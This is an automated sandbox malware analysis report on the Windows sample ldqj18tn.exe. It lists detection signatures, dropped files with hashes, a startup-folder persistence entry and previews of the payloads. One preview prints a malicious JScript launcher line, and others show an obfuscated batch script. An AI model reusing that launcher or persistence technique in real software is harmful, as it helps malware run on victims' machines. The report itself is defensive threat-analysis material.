behaviorgraph top1 dnsIp2 2 Behavior Graph ID: 1577511 Sample: ldqj18tn.exe Startdate: 18/12/2024 Architecture: WINDOWS Score: 84 57 zaZEComvggHsSEuOVnvSMAnVIZblq.zaZEComvggHsSEuOVnvSMAnVIZblq 2->57 63 Multi AV Scanner detection for submitted file 2->63 65 Sigma detected: Search for Antivirus process 2->65 67 Sigma detected: Drops script at startup location 2->67 69 2 other signatures 2->69 10 ldqj18tn.exe 30 2->10         started        14 wscript.exe 1 2->14         started        signatures3 process4 file5 49 C:\Users\user\AppData\Local\Temp\Becoming, DOS 10->49 dropped 51 C:\Users\user\AppData\Local\Temp\Traveller, data 10->51 dropped 53 C:\Users\user\AppData\Local\Temp\Situations, data 10->53 dropped 55 13 other malicious files 10->55 dropped 75 Writes many files with high entropy 10->75 16 cmd.exe 3 10->16         started        77 Windows Scripting host queries suspicious COM object (likely to drop second stage) 14->77 20 InnoMesh.scr 14->20         started        signatures6 process7 file8 37 C:\Users\user\AppData\...\Organizational.pif, PE32 16->37 dropped 59 Drops PE files with a suspicious file extension 16->59 61 Writes many files with high entropy 16->61 22 Organizational.pif 4 16->22         started        26 cmd.exe 2 16->26         started        28 conhost.exe 16->28         started        30 7 other processes 16->30 signatures9 process10 file11 41 C:\Users\user\AppData\Local\...\InnoMesh.scr, PE32 22->41 dropped 43 C:\Users\user\AppData\Local\...\M, data 22->43 dropped 45 C:\Users\user\AppData\Local\...\InnoMesh.js, ASCII 22->45 dropped 71 Drops PE files with a suspicious file extension 22->71 73 Writes many files with high entropy 22->73 32 cmd.exe 2 22->32         started        47 C:\Users\user\AppData\Local\Temp\704579\u, data 26->47 dropped signatures12 process13 file14 39 C:\Users\user\AppData\...\InnoMesh.url, MS 32->39 dropped 35 conhost.exe 32->35         started        process15

This section contains all screenshots as thumbnails, including those not shown in the slideshow.


windows-stand
SourceDetectionScannerLabelLink
ldqj18tn.exe66%ReversingLabsWin32.Trojan.Leonem
SourceDetectionScannerLabelLink
C:\Users\user\AppData\Local\TechMesh Dynamics\InnoMesh.scr8%ReversingLabs
C:\Users\user\AppData\Local\Temp\704579\Organizational.pif8%ReversingLabs
C:\Users\user\AppData\Local\Temp\Becoming0%ReversingLabs
No Antivirus matches
No Antivirus matches
No Antivirus matches
NameIPActiveMaliciousAntivirus DetectionReputation
zaZEComvggHsSEuOVnvSMAnVIZblq.zaZEComvggHsSEuOVnvSMAnVIZblq
unknown
unknownfalse
    unknown
    NameSourceMaliciousAntivirus DetectionReputation
    http://www.autoitscript.com/autoit3/Jldqj18tn.exe, 00000000.00000003.2138986925.00000000029E0000.00000004.00000020.00020000.00000000.sdmp, Organizational.pif, 0000000B.00000002.4002697933.0000000000FB9000.00000002.00000001.01000000.00000006.sdmp, Organizational.pif, 0000000B.00000003.2196969665.000000000437C000.00000004.00000800.00020000.00000000.sdmp, InnoMesh.scr, 00000011.00000002.4002398623.0000000000E39000.00000002.00000001.01000000.00000008.sdmp, Organizational.pif.2.dr, Volunteer.0.dr, InnoMesh.scr.11.drfalse
      high
      http://nsis.sf.net/NSIS_ErrorErrorldqj18tn.exefalse
        high
        https://www.autoitscript.com/autoit3/ldqj18tn.exe, 00000000.00000003.2138986925.00000000029E0000.00000004.00000020.00020000.00000000.sdmp, Organizational.pif, 0000000B.00000002.4004748020.0000000003CFB000.00000004.00000020.00020000.00000000.sdmp, Organizational.pif, 0000000B.00000003.2196969665.000000000437C000.00000004.00000800.00020000.00000000.sdmp, Organizational.pif.2.dr, Volunteer.0.dr, InnoMesh.scr.11.drfalse
          high
          No contacted IP infos
          Joe Sandbox version:41.0.0 Charoite
          Analysis ID:1577511
          Start date and time:2024-12-18 14:50:05 +01:00
          Joe Sandbox product:CloudBasic
          Overall analysis duration:0h 9m 15s
          Hypervisor based Inspection enabled:false
          Report type:full
          Cookbook file name:default.jbs
          Analysis system description:Windows 10 x64 22H2 with Office Professional Plus 2019, Chrome 117, Firefox 118, Adobe Reader DC 23, Java 8 Update 381, 7zip 23.01
          Run name:Run with higher sleep bypass
          Number of analysed new started processes analysed:21
          Number of new started drivers analysed:0
          Number of existing processes analysed:0
          Number of existing drivers analysed:0
          Number of injected processes analysed:0
          Technologies:
          • HCA enabled
          • EGA enabled
          • AMSI enabled
          Analysis Mode:default
          Analysis stop reason:Timeout
          Sample name:ldqj18tn.exe
          Detection:MAL
          Classification:mal84.rans.expl.evad.winEXE@28/26@2/0
          EGA Information:
          • Successful, ratio: 100%
          HCA Information:
          • Successful, ratio: 100%
          • Number of executed functions: 103
          • Number of non-executed functions: 293
          Cookbook Comments:
          • Found application associated with file extension: .exe
          • Sleeps bigger than 100000000ms are automatically reduced to 1000ms
          • Sleep loops longer than 100000000ms are bypassed. Single calls with delay of 100000000ms and higher are ignored
          • Exclude process from analysis (whitelisted): dllhost.exe, WMIADAP.exe, SIHClient.exe
          • Excluded IPs from analysis (whitelisted): 13.107.246.63, 20.12.23.50
          • Excluded domains from analysis (whitelisted): client.wns.windows.com, ocsp.digicert.com, otelrules.azureedge.net, slscr.update.microsoft.com, ctldl.windowsupdate.com, fe3cr.delivery.mp.microsoft.com
          • Not all processes where analyzed, report is missing behavior information
          • Report creation exceeded maximum time and may have missing disassembly code information.
          • Report size exceeded maximum capacity and may have missing behavior information.
          • Report size exceeded maximum capacity and may have missing disassembly code.
          • Report size getting too big, too many NtOpenKeyEx calls found.
          • Report size getting too big, too many NtQueryValueKey calls found.
          • Report size getting too big, too many NtSetInformationFile calls found.
          • VT rate limit hit for: ldqj18tn.exe
          TimeTypeDescription
          14:51:06AutostartRun: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\InnoMesh.url
          No context
          No context
          No context
          No context
          MatchAssociated Sample Name / URLSHA 256DetectionThreat NameLinkContext
          C:\Users\user\AppData\Local\Temp\704579\Organizational.pifEO3RT0fEfb.exeGet hashmaliciousUnknownBrowse
            RMBOriPHVJ.exeGet hashmaliciousUnknownBrowse
              S6x3K8vzCA.exeGet hashmaliciousUnknownBrowse
                PPbimZI4LV.exeGet hashmaliciousUnknownBrowse
                  l5VhEpwzJy.exeGet hashmaliciousUnknownBrowse
                    duyba.lnk.download.lnkGet hashmaliciousUnknownBrowse
                      pt8GJiNZDT.exeGet hashmaliciousUnknownBrowse
                        c2.htaGet hashmaliciousXWormBrowse
                          c2.htaGet hashmaliciousXWormBrowse
                            C:\Users\user\AppData\Local\TechMesh Dynamics\InnoMesh.scrEO3RT0fEfb.exeGet hashmaliciousUnknownBrowse
                              RMBOriPHVJ.exeGet hashmaliciousUnknownBrowse
                                S6x3K8vzCA.exeGet hashmaliciousUnknownBrowse
                                  PPbimZI4LV.exeGet hashmaliciousUnknownBrowse
                                    l5VhEpwzJy.exeGet hashmaliciousUnknownBrowse
                                      duyba.lnk.download.lnkGet hashmaliciousUnknownBrowse
                                        pt8GJiNZDT.exeGet hashmaliciousUnknownBrowse
                                          c2.htaGet hashmaliciousXWormBrowse
                                            c2.htaGet hashmaliciousXWormBrowse
                                              Process:C:\Users\user\AppData\Local\Temp\704579\Organizational.pif
                                              File Type:ASCII text, with no line terminators
                                              Category:dropped
                                              Size (bytes):177
                                              Entropy (8bit):4.652268392258587
                                              Encrypted:false
                                              SSDEEP:3:RiMIpGXIdPHo55wWAX+eLCMuL4EkD5xAaUFJl2FZo5uWAX+eLCMuL4EkD5xAaUFj:RiJBJHonwWDeLPqJkDvxUFT2FywWDeLu
                                              MD5:BE7A071668D410522BF92334A91B377C
                                              SHA1:5BEA960EE3C5A9765FB5C6B490B9EF5C26A4E229
                                              SHA-256:127FFBABF7B1F2B2DB1CD72BBC6BA5D1825A18751DF54F51B8807332BE4D6318
                                              SHA-512:E270C0A3CE26DFBDADAD3549B6C57422E6769ED20E3CF01E2502779EE618F8BBB39133423A4ABAD030768962FB0851BF6701534DE9A76B1CDBDE6483F3B0A9C3
                                              Malicious:true
                                              Preview:new ActiveXObject("Wscript.Shell").Exec("\"C:\\Users\\user\\AppData\\Local\\TechMesh Dynamics\\InnoMesh.scr\" \"C:\\Users\\user\\AppData\\Local\\TechMesh Dynamics\\M\"")
                                              Process:C:\Users\user\AppData\Local\Temp\704579\Organizational.pif
                                              File Type:PE32 executable (GUI) Intel 80386, for MS Windows
                                              Category:dropped
                                              Size (bytes):893608
                                              Entropy (8bit):6.62028134425878
                                              Encrypted:false
                                              SSDEEP:12288:WpV0etV7qtINsegA/rMyyzlcqakvAfcN9b2MyZa31tqoPTdFbgawV2501:WTxz1JMyyzlohMf1tN70aw8501
                                              MD5:18CE19B57F43CE0A5AF149C96AECC685
                                              SHA1:1BD5CA29FC35FC8AC346F23B155337C5B28BBC36
                                              SHA-256:D8B7C7178FBADBF169294E4F29DCE582F89A5CF372E9DA9215AA082330DC12FD
                                              SHA-512:A0C58F04DFB49272A2B6F1E8CE3F541A030A6C7A09BB040E660FC4CD9892CA3AC39CF3D6754C125F7CD1987D1FCA01640A153519B4E2EB3E3B4B8C9DC1480558
                                              Malicious:true
                                              Antivirus:
                                              • Antivirus: ReversingLabs, Detection: 8%
                                              Joe Sandbox View:
                                              • Filename: EO3RT0fEfb.exe, Detection: malicious, Browse
                                              • Filename: RMBOriPHVJ.exe, Detection: malicious, Browse
                                              • Filename: S6x3K8vzCA.exe, Detection: malicious, Browse
                                              • Filename: PPbimZI4LV.exe, Detection: malicious, Browse
                                              • Filename: l5VhEpwzJy.exe, Detection: malicious, Browse
                                              • Filename: duyba.lnk.download.lnk, Detection: malicious, Browse
                                              • Filename: pt8GJiNZDT.exe, Detection: malicious, Browse
                                              • Filename: c2.hta, Detection: malicious, Browse
                                              • Filename: c2.hta, Detection: malicious, Browse
                                              Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$........sD.R.*.R.*.R.*..C..P.*....S.*._@..a.*._@....*._@..g.*.[j..[.*.[j..w.*.R.+.r.*......*....S.*._@..S.*.R...P.*....S.*.RichR.*.........................PE..L...._pZ.........."...............................@.......................................@...@.......@.........................|.......P....................p...q...;.............................. [..@............................................text............................... ..`.rdata..............................@..@.data...t........R..................@....rsrc...P............<..............@..@.reloc...q...p...r..................@..B................................................................................................................................................................................................................................................................................
                                              Process:C:\Users\user\AppData\Local\Temp\704579\Organizational.pif
                                              File Type:data
                                              Category:dropped
                                              Size (bytes):1177035
                                              Entropy (8bit):7.999838432083651
                                              Encrypted:true
                                              SSDEEP:24576:uWgaEyFxeBEglui3XzLBMX2rgfXG5KXZCN277jTzsc:0yFxAVumMX2rgfSKXoN277vzd
                                              MD5:AB0020D503E99E956AB92579E6690327
                                              SHA1:9E3ACD23F62F72CCABDBBCBAF21C31986FD694EA
                                              SHA-256:14A900791A0CF3D1A98491DC6E108EA1C814B41579F33851CF7A02460B9F9387
                                              SHA-512:BB2B853B050B7F778011FB9359D1E57808EB3FF3A4905679254E66C3F9C3B1FD6CC18C5589B11E96037ECCE2B4CB06B73433CDC704FD312C232AF98BBC151C6E
                                              Malicious:true
                                              Preview:.8...tZ.{.|..>......<../.b..*....C zK.U5....M{..Mg.........Vx.U.I.}8......~.......!.U;..".....[.2........*NJ...y..pEmB...<[g'~"..U..V.,.*.f......E.K.M.......(.^.O..|.CKCU ..~S`h9V..F.9.k.V'.>..S.....i.m..YDA...p..Gx......9.A.....pi.$...KL.O...m^.cq...W.M.....5.&g.t.7...`...t..-*1..8x.PA.H...].}..9/7.b..........l....j.|...Wne]w.... A..F*-G.%.e.!..R.`t.<...7.".....gNM.?.5..$.eM...>1T............M\nZJ...?.-LZ..C..jO9bl?......I..."Y..{..^;.F)N....^."......./.\a4h......:..0^.e..Y1m...j.D.xgw..........n.....4..0N*...n+#..v..NQ.....".X@...d..Fg...'[......s.l.-a..<....X_~E]Y.8..T..?...*.h.U@.6\....7..p...]....ws..4-...X..>4'.......Ccn^.../.p...]....B.2kX.......~.WQF.\..dU.H..!...P1.....[.......}`7.kc..L.....N=-..Qf:...>......1..l...1....t..@..l.at.%..%.a........H.?.&1..kz...m...=.<....*.]d.V..$..4N..Z.Q.JA..W...*p...j.b.#n.{...=.@s[.}_....+..M..d.^..+~.y....QO.dG.<.....{.#r.c.3...H...}....9.9..g.qxr..~UoIl..oo8...T...........il..
                                              Process:C:\Windows\SysWOW64\cmd.exe
                                              File Type:PE32 executable (GUI) Intel 80386, for MS Windows
                                              Category:modified
                                              Size (bytes):893608
                                              Entropy (8bit):6.62028134425878
                                              Encrypted:false
                                              SSDEEP:12288:WpV0etV7qtINsegA/rMyyzlcqakvAfcN9b2MyZa31tqoPTdFbgawV2501:WTxz1JMyyzlohMf1tN70aw8501
                                              MD5:18CE19B57F43CE0A5AF149C96AECC685
                                              SHA1:1BD5CA29FC35FC8AC346F23B155337C5B28BBC36
                                              SHA-256:D8B7C7178FBADBF169294E4F29DCE582F89A5CF372E9DA9215AA082330DC12FD
                                              SHA-512:A0C58F04DFB49272A2B6F1E8CE3F541A030A6C7A09BB040E660FC4CD9892CA3AC39CF3D6754C125F7CD1987D1FCA01640A153519B4E2EB3E3B4B8C9DC1480558
                                              Malicious:true
                                              Antivirus:
                                              • Antivirus: ReversingLabs, Detection: 8%
                                              Joe Sandbox View:
                                              • Filename: EO3RT0fEfb.exe, Detection: malicious, Browse
                                              • Filename: RMBOriPHVJ.exe, Detection: malicious, Browse
                                              • Filename: S6x3K8vzCA.exe, Detection: malicious, Browse
                                              • Filename: PPbimZI4LV.exe, Detection: malicious, Browse
                                              • Filename: l5VhEpwzJy.exe, Detection: malicious, Browse
                                              • Filename: duyba.lnk.download.lnk, Detection: malicious, Browse
                                              • Filename: pt8GJiNZDT.exe, Detection: malicious, Browse
                                              • Filename: c2.hta, Detection: malicious, Browse
                                              • Filename: c2.hta, Detection: malicious, Browse
                                              Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$........sD.R.*.R.*.R.*..C..P.*....S.*._@..a.*._@....*._@..g.*.[j..[.*.[j..w.*.R.+.r.*......*....S.*._@..S.*.R...P.*....S.*.RichR.*.........................PE..L...._pZ.........."...............................@.......................................@...@.......@.........................|.......P....................p...q...;.............................. [..@............................................text............................... ..`.rdata..............................@..@.data...t........R..................@....rsrc...P............<..............@..@.reloc...q...p...r..................@..B................................................................................................................................................................................................................................................................................
                                              Process:C:\Windows\SysWOW64\cmd.exe
                                              File Type:data
                                              Category:dropped
                                              Size (bytes):1177035
                                              Entropy (8bit):7.999838432083651
                                              Encrypted:true
                                              SSDEEP:24576:uWgaEyFxeBEglui3XzLBMX2rgfXG5KXZCN277jTzsc:0yFxAVumMX2rgfSKXoN277vzd
                                              MD5:AB0020D503E99E956AB92579E6690327
                                              SHA1:9E3ACD23F62F72CCABDBBCBAF21C31986FD694EA
                                              SHA-256:14A900791A0CF3D1A98491DC6E108EA1C814B41579F33851CF7A02460B9F9387
                                              SHA-512:BB2B853B050B7F778011FB9359D1E57808EB3FF3A4905679254E66C3F9C3B1FD6CC18C5589B11E96037ECCE2B4CB06B73433CDC704FD312C232AF98BBC151C6E
                                              Malicious:true
                                              Preview:.8...tZ.{.|..>......<../.b..*....C zK.U5....M{..Mg.........Vx.U.I.}8......~.......!.U;..".....[.2........*NJ...y..pEmB...<[g'~"..U..V.,.*.f......E.K.M.......(.^.O..|.CKCU ..~S`h9V..F.9.k.V'.>..S.....i.m..YDA...p..Gx......9.A.....pi.$...KL.O...m^.cq...W.M.....5.&g.t.7...`...t..-*1..8x.PA.H...].}..9/7.b..........l....j.|...Wne]w.... A..F*-G.%.e.!..R.`t.<...7.".....gNM.?.5..$.eM...>1T............M\nZJ...?.-LZ..C..jO9bl?......I..."Y..{..^;.F)N....^."......./.\a4h......:..0^.e..Y1m...j.D.xgw..........n.....4..0N*...n+#..v..NQ.....".X@...d..Fg...'[......s.l.-a..<....X_~E]Y.8..T..?...*.h.U@.6\....7..p...]....ws..4-...X..>4'.......Ccn^.../.p...]....B.2kX.......~.WQF.\..dU.H..!...P1.....[.......}`7.kc..L.....N=-..Qf:...>......1..l...1....t..@..l.at.%..%.a........H.?.&1..kz...m...=.<....*.]d.V..$..4N..Z.Q.JA..W...*p...j.b.#n.{...=.@s[.}_....+..M..d.^..+~.y....QO.dG.<.....{.#r.c.3...H...}....9.9..g.qxr..~UoIl..oo8...T...........il..
                                              Process:C:\Users\user\Desktop\ldqj18tn.exe
                                              File Type:data
                                              Category:dropped
                                              Size (bytes):36299
                                              Entropy (8bit):7.995142843999967
                                              Encrypted:true
                                              SSDEEP:768:hfbk8c2PiL7CZcLVF7u3yq2OvvRZ+4BKKMtwFMsKCWf+QJddWz6nHu:tSqZcv6yq2OvZJ52dIzd
                                              MD5:48EEF161688B28BF638E0EC37DABB593
                                              SHA1:DD30CC2936BD9BE8C977653FC8E0590A0A96D707
                                              SHA-256:32873FBEC30BA467A770F8FA5D18AE9F5D30B383E1761036EC9CDF0491C9E57A
                                              SHA-512:3C76F72DF956D71E79E6BFFF54D6A8FACEE0F6A41CE0D7CD564BBFBA48B1C381A49B3C61E91BCE6C84FE172C55C791CD65665E0D26E4F7356C4457B712A788C9
                                              Malicious:true
                                              Preview:...t.Pma....*..s.#$*,..yO....yo.+......d=..$?.c..>...I...3}.#..L7.......j.....l~.Up.b....j.F.]..}D...{.id........(PQcr.p.k3...~B.qmA..tn~C.c.vc....Pq....r...6y...c*W...2z..N4...0Qd2.P..C..S....9._..u......z.....x....93TX...Y.r).=..>..9I-!.\`.T.......6.@:.B...=M.....]..[Q...W.<.'.t.Z.pq...C....<.....-.{>...o.S..5@.ry..7~Z.E.....MY......._!.........lrE......u...45....._b.P...`(..,_.W. .}kE}.}x.>...1.....,:1......T...6M.C.i...lk..K.........M....EM#.xa$L.e...,.L{...;c...G\....a.3.VM...Xcq.L...6d..r[...Ff(..{..}..Mzpv..;..e*T.>..O.....4.I......(r...."....Q...H....J....e......|.eC)S}.^L....c...5n>.q9....p.......dv..-&.....<.^.....C...%...4..n.S..L.#......C.e. G...H..(....q...2.k."......(.h-Uc.4.k.e..wA..yO.1.@.#......I..g.............3V.[....,[U"4.w...X'T1...1n:../E.G... ...Z.YRL+*(.....^.9...W;5..c..1..N. k....D..<:.~@..>.].e.r!.....dz%.Q....7...:..s....0 ...R..Q#.......`..v+.._.....T.F. ....E....)!...].#...........%.....=.&..i."O.c........g....'...aB0
                                              Process:C:\Users\user\Desktop\ldqj18tn.exe
                                              File Type:DOS executable (COM, 0x8C-variant)
                                              Category:dropped
                                              Size (bytes):93184
                                              Entropy (8bit):7.998062404457295
                                              Encrypted:true
                                              SSDEEP:1536:oA8gnQiP6RbR5TZJHTPs1GZO7ktznBUDjnMTcWh3FFHkPFGUFcAw2xNhz:m3iPEhTPs1GZO7k1nwDMJ3Pkzcyp
                                              MD5:73F15B295CA059461F4CCEA25DD9A56A
                                              SHA1:0B2834B85A315A2417C7AB51842937F3AD2E34DD
                                              SHA-256:CF1527A390FE3B945F60BA46F139D5EFCC8B20712A6388FE0FF99CAD6B661CF8
                                              SHA-512:31A459460A7D1C65AFFE2E085AC3835BF2C40EF0112F3C11AD6821B56A452B1EA53F5BF31FE2C83DBDE689D381506E54729BC515DA8E8F86BF6AE1F0785DB0CE
                                              Malicious:true
                                              Antivirus:
                                              • Antivirus: ReversingLabs, Detection: 0%
                                              Preview:.......;. !..t&.J".'.6.+....&{.z....$...9.3.p8i..;.76z.....y......+xuz......p..Q.p.Ub...&.h........P..4."...t..A`...".R....h.,.M/.4.`.....7ZW.bp...KE....)`........V.nFG.Z......Y7....[:($..Z%...m....Q.?.@.k"(.*...Q..e".).s....W|.HMR..^Vs..Z....k.`..J.fG.3 .t..:.4./;.....%...</.......y]@..0...../.?hw.....{x.g....A....|.0{.*.../.}O.P.:.n...{.vw^.v<z.Oiv(...49..1s...w<...gt..!b.t.XhM.?..<.8.U...m.i_I...hMNc..-.t.....Y=........"A.d...tvt.^..5T...G.8Y.u4%W..+..:..I..<.........Y..K.$!.?Y.....AA......;]..g...,..a.j....RlS..i.ll.F.FD.^.(7\x.]..!..:DP^..>.l=m.T..R.......:...aj.......$......3........_bh...sT-ar..b......gp....0MR.&.R....G92U.`"...[...8k..>(.'....R. .N8.y.....`.6.A.a....@....x..^...BQ/L.<...m....e...X...b......z...U..]...5x$.%..RK.S....a.R.5.z.A.F..$;6W...I.0..9.,....4%....u...m...RB.....@..`.(."Qj...e...s*..L.=o#4../.0.K.#Et.BQo..UX.....>..G.F.|#]..F..UE.L..M...C.I...x.%q.(.~.. d.Sj.#s9.n..w<...%.+,v.f...hZ..Z..'f$...l..A.9K.3...
                                              Process:C:\Users\user\Desktop\ldqj18tn.exe
                                              File Type:data
                                              Category:dropped
                                              Size (bytes):94208
                                              Entropy (8bit):7.997963539367384
                                              Encrypted:true
                                              SSDEEP:1536:Getdq5yUrLGdyN60kxmcPu37oudLvidDCG4jx3yF8+Z3v8jdUU1tq00toMT:GetdqnidyNdmRGc2L+CcF8+Z0xUU1tqX
                                              MD5:75257307B8D4D5B354711B1AFB9807B9
                                              SHA1:F61C1599DEA1E8BCA46CF7176F5C367FC6C682F9
                                              SHA-256:7F34EA53E7774CE8455BF3EC2F6A38CA870740B05D866073ABF8738874212DE1
                                              SHA-512:B1317965AADC83E85CE16A839FAD180AC2BF0356BA305D1D14D33E22ECE8B7980CB5C9543E40B5C6830F626749AC233E4C2CB6A925DC72A8F85C49BD5FD67BDC
                                              Malicious:true
                                              Preview:..<...!......\.....[.N8...X.{..?.Z%Z.z...... ..{.<$..2..........<....-..8.K...!..3G..5.Q..,.X0..2.\.....@......S...y......R>....."..n$r..?..[...gX(.P.D16Y..I.-.$........K....R.....|.#...w..[3?....y9YN.?.#..H\X.......d..k...29...../....+.v/....S...=....8..=.?||...a.M..g.1......+b.16.H.K..>....g.~.q9..z.[7\bG....2u1.n...(.....*.1...x.........%.S._.........V/.6..P..P6.G..Op.x(.1VvE.{..-.3."&=*.....]..@.Q.,...S..CmBh.(....&......#..|.u..).6S>..Y.u...wY@..R.w..4.A.W.]x.Q\.x.]y.m.'.S9.M....<K.. ..G9...-.x......d.xTk....~..>\H.....11..Zl..o......e....~.+$)...P.b.7..I...c..F.!.W.&.x..i..=..k{..=......dY!c......UJUX...'E..%.......-.`.ut..o..A.C/....c.u......:.Yp...\;..PTyw....ap.../C..r..OM(....t.........ft.h<...2...<.t7...?.G..c.....2.J...-"....[.#.^c....X.-G,.^2............VX....O.&.....(E:...M..h .+.).o.NG..........I.s.{......l.hWmt...5o.]..!W.">..:/rr.O...).... FE....1UC........t.rs..d...D.6.#V....k0.L...&&..g...,....w..`.[...w
                                              Process:C:\Users\user\Desktop\ldqj18tn.exe
                                              File Type:data
                                              Category:dropped
                                              Size (bytes):96256
                                              Entropy (8bit):7.998514868354388
                                              Encrypted:true
                                              SSDEEP:1536:IvdYLR3NuhKqrKEN3tMdLgN/AfOTtbxaKiA9G0FnCerGGg/WTEFiIeHrygOI+T:IvdeRq39Mpg+fO/7ieGACmgyEF8ZOx
                                              MD5:C4E8EDFE5D08067625B63F23C2E8FB8A
                                              SHA1:D76FA360F0FE278C791442E9208A591C86476AF3
                                              SHA-256:B5638AA2E4141715075A21BA1D69D2E8B53E5CF055564C9E2B80E20A5340A766
                                              SHA-512:1AB6204134558D8AA28D43E7B860B57FAC12DA3F653A34FB5892D9241B04E7CBFFF3B5F8F8C2623F7354D0F9DF1078B19532F64CBD029D2D32B4D17863BD345F
                                              Malicious:true
                                              Preview:.8...tZ.{.|..>......<../.b..*....C zK.U5....M{..Mg.........Vx.U.I.}8......~.......!.U;..".....[.2........*NJ...y..pEmB...<[g'~"..U..V.,.*.f......E.K.M.......(.^.O..|.CKCU ..~S`h9V..F.9.k.V'.>..S.....i.m..YDA...p..Gx......9.A.....pi.$...KL.O...m^.cq...W.M.....5.&g.t.7...`...t..-*1..8x.PA.H...].}..9/7.b..........l....j.|...Wne]w.... A..F*-G.%.e.!..R.`t.<...7.".....gNM.?.5..$.eM...>1T............M\nZJ...?.-LZ..C..jO9bl?......I..."Y..{..^;.F)N....^."......./.\a4h......:..0^.e..Y1m...j.D.xgw..........n.....4..0N*...n+#..v..NQ.....".X@...d..Fg...'[......s.l.-a..<....X_~E]Y.8..T..?...*.h.U@.6\....7..p...]....ws..4-...X..>4'.......Ccn^.../.p...]....B.2kX.......~.WQF.\..dU.H..!...P1.....[.......}`7.kc..L.....N=-..Qf:...>......1..l...1....t..@..l.at.%..%.a........H.?.&1..kz...m...=.<....*.]d.V..$..4N..Z.Q.JA..W...*p...j.b.#n.{...=.@s[.}_....+..M..d.^..+~.y....QO.dG.<.....{.#r.c.3...H...}....9.9..g.qxr..~UoIl..oo8...T...........il..
                                              Process:C:\Users\user\Desktop\ldqj18tn.exe
                                              File Type:ASCII text, with very long lines (687), with CRLF line terminators
                                              Category:dropped
                                              Size (bytes):13560
                                              Entropy (8bit):5.152446332556762
                                              Encrypted:false
                                              SSDEEP:384:vA5nkQWyUEMHlWiSDhV5qRwcbar5DrwcqEw/D486HsT2pn:vAVk5yUZHlWiSDDTrBrfqjc8wRpn
                                              MD5:D85FE4F4F91482191B18B60437C1944D
                                              SHA1:C639206AD03A4FCC600CE0F7F3D5F83AD1F505A1
                                              SHA-256:55941822431D9EB34DEAEF5917640E119FCD746F2D3985E211A2FF4A9C48FF92
                                              SHA-512:BD5E46C10DEC7D40E0151DABB28C77B077CE9BC2B853B01DECBCD296F6269051A01115C349DC094BBCF14153A13395FC7E5AB74DD53EB5B2DFBC4BF856692B09
                                              Malicious:false
                                              Preview:Set Fellow=r..EOtCosmetics-Sell-..tGMEArmenia-Fraud-..oPInstalling-Acquire-Groups-Americans-Promises-Ma-Wise-..QhqReligious-Ja-Desire-Frederick-Blowing-Sv-Legislative-Mileage-Fax-..isAHurricane-Damn-Inner-Efficient-..Set Mall=N..hacMapping-..debBillion-Channel-Integration-Might-Recorder-Bingo-..MCxAShower-Australian-Calculate-Tail-..xPWit-Lazy-..PzBasketball-Areas-Listening-Centered-Away-..kbCollectables-Temp-..Set Saskatchewan=X..UppaInnocent-Eugene-Examinations-Rw-..TvbSCocks-Statute-Flat-Mortality-Dominant-Metres-Sufficient-Seekers-Headset-..ZkMariah-..PASpot-..BoCrop-Publicly-Mel-..EvjlFinding-..LEhPhp-Earned-Aging-Greg-..gajhLight-Cod-Flat-Harm-Noted-Mounts-Further-..EuQuebec-Notice-Drinking-Front-Claimed-Symptoms-Vampire-Supporting-..RIBFrames-Membership-..Set Fluid=V..iQmEmployed-Single-Norway-Cloudy-Toy-..WfQReached-Glucose-..maePj-Atlas-Proof-..FYeNm-Throat-Spreading-..ojcSmile-..QCOperator-Browsers-Talented-Colonial-Hewlett-Subscriptions-Em-Interesting-Therapeutic-..Set Lodge
                                              Process:C:\Windows\SysWOW64\cmd.exe
                                              File Type:ASCII text, with very long lines (687), with CRLF line terminators
                                              Category:dropped
                                              Size (bytes):13560
                                              Entropy (8bit):5.152446332556762
                                              Encrypted:false
                                              SSDEEP:384:vA5nkQWyUEMHlWiSDhV5qRwcbar5DrwcqEw/D486HsT2pn:vAVk5yUZHlWiSDDTrBrfqjc8wRpn
                                              MD5:D85FE4F4F91482191B18B60437C1944D
                                              SHA1:C639206AD03A4FCC600CE0F7F3D5F83AD1F505A1
                                              SHA-256:55941822431D9EB34DEAEF5917640E119FCD746F2D3985E211A2FF4A9C48FF92
                                              SHA-512:BD5E46C10DEC7D40E0151DABB28C77B077CE9BC2B853B01DECBCD296F6269051A01115C349DC094BBCF14153A13395FC7E5AB74DD53EB5B2DFBC4BF856692B09
                                              Malicious:false
                                              Preview:Set Fellow=r..EOtCosmetics-Sell-..tGMEArmenia-Fraud-..oPInstalling-Acquire-Groups-Americans-Promises-Ma-Wise-..QhqReligious-Ja-Desire-Frederick-Blowing-Sv-Legislative-Mileage-Fax-..isAHurricane-Damn-Inner-Efficient-..Set Mall=N..hacMapping-..debBillion-Channel-Integration-Might-Recorder-Bingo-..MCxAShower-Australian-Calculate-Tail-..xPWit-Lazy-..PzBasketball-Areas-Listening-Centered-Away-..kbCollectables-Temp-..Set Saskatchewan=X..UppaInnocent-Eugene-Examinations-Rw-..TvbSCocks-Statute-Flat-Mortality-Dominant-Metres-Sufficient-Seekers-Headset-..ZkMariah-..PASpot-..BoCrop-Publicly-Mel-..EvjlFinding-..LEhPhp-Earned-Aging-Greg-..gajhLight-Cod-Flat-Harm-Noted-Mounts-Further-..EuQuebec-Notice-Drinking-Front-Claimed-Symptoms-Vampire-Supporting-..RIBFrames-Membership-..Set Fluid=V..iQmEmployed-Single-Norway-Cloudy-Toy-..WfQReached-Glucose-..maePj-Atlas-Proof-..FYeNm-Throat-Spreading-..ojcSmile-..QCOperator-Browsers-Talented-Colonial-Hewlett-Subscriptions-Em-Interesting-Therapeutic-..Set Lodge
                                              Process:C:\Users\user\Desktop\ldqj18tn.exe
                                              File Type:data
                                              Category:dropped
                                              Size (bytes):81920
                                              Entropy (8bit):7.997721698642565
                                              Encrypted:true
                                              SSDEEP:1536:YReT3S6RaPlwij6WqGnCf/x9TkXGr8nwvp1aYzERXM7Wi:48hRGwlGS/8XGr8n2pBgXXi
                                              MD5:7B60F0D191C0904F3F5BE40433D86F73
                                              SHA1:E6B09A6670797332B8861FC93F44DA7CF224BBCB
                                              SHA-256:AA1CC0C31C1C15CCFF224BA06596D8DEF6F510280F077BA201650F18B0D67D90
                                              SHA-512:1D8FF33C53794E3467968F747172DBFDC362E99E24CE6652A0860FE4094D5A861ED2E2C307577FE033AF39836268BC6EF2CDB331AE8FB3B58F2FC7A3EBA257A8
                                              Malicious:true
